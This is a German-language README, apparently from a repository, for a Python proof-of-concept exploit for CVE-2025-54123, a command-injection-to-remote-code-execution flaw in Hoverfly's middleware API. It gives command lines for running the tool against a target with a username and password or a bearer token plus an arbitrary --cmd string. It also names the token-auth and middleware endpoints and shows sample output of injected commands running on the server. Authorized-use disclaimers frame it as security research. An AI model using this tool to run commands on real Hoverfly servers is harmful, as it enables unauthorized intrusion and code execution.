
Python-Proof-of-Concept für CVE-2025-54123, der eine Befehlsinjektion bis hin zur Remotecodeausführung (RCE) in der Hoverfly-Middleware-API mit anmeldeinformations- oder tokenbasierter Authentifizierung demonstriert.
Dieses Repository enthält ein Python Proof-of-Concept (PoC)-Skript für die Interaktion mit Hoverfly-Instanzen, die von CVE-2025-54123 betroffen sind.
Das Skript unterstützt:
Warnung
Dieses Projekt ist ausschließlich für autorisierte Sicherheitsforschung, Tests und Bildungszwecke bestimmt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.
Abhängigkeiten installieren:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| Argument | Beschreibung |
|---|---|
--target | Zieldomain oder IP-Adresse |
--port | Port des Zieldienstes |
-u | Hoverfly-Benutzername |
-p | Hoverfly-Passwort |
--token | Vorhandenes Bearer-Token |
--cmd | Befehlszeichenkette für den Middleware-Endpunkt |
Wenn Anmeldedaten bereitgestellt werden:
/api/token-auth
Das Skript kommuniziert mit:
/api/v2/hoverfly/middleware
über eine authentifizierte PUT-Anfrage.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
Dieses Repository wird ausschließlich für Bildungs-, Abwehrsicherheits- und autorisierte Testzwecke bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen, die aus der Verwendung dieser Software entstehen.